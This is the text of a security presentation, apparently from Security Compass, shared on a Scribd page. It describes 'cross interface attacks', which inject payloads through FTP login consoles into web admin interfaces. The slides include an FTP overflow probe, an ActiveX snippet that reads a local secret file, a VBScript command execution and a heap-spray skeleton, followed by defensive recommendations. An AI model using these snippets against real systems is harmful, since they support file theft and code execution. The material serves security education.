Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Cross Interface Attack

    Enviado por

    piyush.ml20
    41 visualizações26 páginas
    A new attack vector for performing web attack using backend login console like ftp etc.

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    PPTX, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    A new attack vector for performing web attack using backend login console like ftp etc.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PPTX, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    41 visualizações26 páginas

    Cross Interface Attack

    Enviado por

    piyush.ml20
    A new attack vector for performing web attack using backend login console like ftp etc.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PPTX, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 26

    Piyush Mittal Security Compass

    Introduction
    When 1 interface is used to attack the other interface.

    Different from XSS


    XSS - Entry point is from web to web CIA - Entry point is from backend login console to web interface

    CIA Characteristics
    Exploits the default nature of FTP /Telnet Protocol

    Admin interfaces : { Web, FTP, Telnet} Logging module running as root DOM and HTML rendered as dynamic content Attacks are persistent in nature Hardware devices firewalls, disk stations, management systems etc.

    Truth About FTP


    The default design of FTP allows the acceptance of both username and password prior to the authentication process and complete verication. No check on no of login attempts. No check on type of characters.

    Old Buffer Trick


    root@redux$ ftp example.com Connected to example.com. 220 Disk Station FTP server at DiskStation ready. User (example.com:(none)): AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA 331 Password required for AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA. Password: 530 Login incorrect. Login failed.

    Design of the Application

    FTP LOGIN INTERFACE

    Design of the Application

    FTP LOGIN INTERFACE


    Inject Payload
    I

    Design of the Application


    FTP Authentication Module FTP LOGIN INTERFACE
    Inject Payload
    I

    Design of the Application


    FTP Authentication Module FTP LOGIN INTERFACE
    Inject Payload
    I

    FTP Logging Module

    Design of the Application


    FTP Authentication Module FTP LOGIN INTERFACE
    Inject Payload
    I FTP Logging module run as root or administrator

    FTP Logging Module

    Design of the Application


    FTP Authentication Module FTP LOGIN INTERFACE
    Inject Payload
    I FTP Logging module run as root or administrator

    FTP Logging Module

    Web Interface

    Design of the Application


    FTP Authentication Module FTP LOGIN INTERFACE
    Inject Payload
    I FTP Logging module run as root or administrator

    FTP Logging Module


    Unencoded/Unfiltered HTML rendering

    Web Interface

    THREATS
    Information Stealing

    Sample code

    THREATS

    Cookie Stealing

    THREATS
    Malware Infections - Executing payloads to conduct Drive by Download Attacks

    Sample code

    THREATS

    Drive by Download Attack

    THREATS
    CSRF

    Sample code Tuning Network device into attack pot

    Advanced Code Injections


    Active X code execution
    var fso = new ActiveXObject(Scripting.FileSystemObject);

    XFile = fso.GetFile(c:/business/secret.txt); stream = XFile.OpenAsTextStream(1, 0); var content = stream.ReadAll();

    Advanced Code Injections


    VBScript code execution
    <object classid=clsid:72C24DD5-D70A-438B-8A4298424B88AFB8 id=target > </object> <script language=vbscript> arg1=c:/WINDOWS/system32/calc.exe target.Exec arg1 </script>

    Advanced Code Injections


    Heap Spray code execution
    var shellcode = unescape(); var heap block=unescape(%u0a0a%u0a0a); var nop sled= unescape(%u09090%u09090%u09090) do { heap_block += heap_block; } while (heap_block.length < xxxx) var memory = new Array(); for (ret=0; ret <100; ret++) { memory[ret] += heap_block+nop_sled+shellcode; }

    Advanced Code Injections


    AJAX code execution

    DEFENSE
    A whitelist approach should be followed at the protocol level to reduce the impact of exploitation. The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles. The logging process should not run as administrator or root user. The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content. The content should be sniffed to avoid the usage of malicious input thereby defining the Content-Type appropriately.

    ???????

    When In doubt, its better to ask

    References
    http://www.google.co.in/search?q=http%3A%2F%2Fmilw0rm.com %2Fexploits%2F6476&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:enUS:official&client=firefox-a#sclient=psy-ab&hl=en&client=firefoxa&rls=org.mozilla:enUS%3Aofficial&source=hp&q=cross+interface+attack&pbx=1&oq=cr oss+interface+attack&aq=f&aqi=&aql=&gs_sm=e&gs_upl=37279l38 938l11l40023l2l2l0l0l0l0l268l492l22l2l0&bav=on.2,or.r_gc.r_pw.&fp=a0ba24de15e40bac&biw=1366& bih=558 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2453 http://www.securityfocus.com/archive/1/archive/1/513970/100/0/ threaded

    Você também pode gostar